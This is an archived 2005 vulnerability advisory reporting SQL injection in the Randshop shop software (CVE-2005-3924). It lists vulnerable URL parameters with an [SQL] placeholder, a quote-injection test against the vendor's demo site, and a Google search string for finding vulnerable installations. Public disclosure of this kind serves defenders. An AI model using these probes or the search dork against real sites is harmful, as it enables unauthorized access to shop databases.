Bug: Randshop all versiyon Sql Injection (WLB-2005110070 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Randshop all versiyon Sql Injection
 Credit: Liz0ziM & wannacut
 Date: 2005.11.29
 CWE: N/A
 CVE: CVE-2005-3924 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

Randshop all versiyon Sql Injection

Website:http://www.randshop.com

Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0 (at) bsdmail (dot) com [email concealed] www.biyo.tk

-------------------------------------------------------------------
exploit :

http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]

------------------------------------------------------------------------
--------
eg:

http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=
21'

--------------------------------------------------------------------

Google:intext:"software 2004-2005 by randshop"

http://www.blogcu.com/Liz0ziM/112800/

http://biyo.5gigs.com/randshop.txt

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com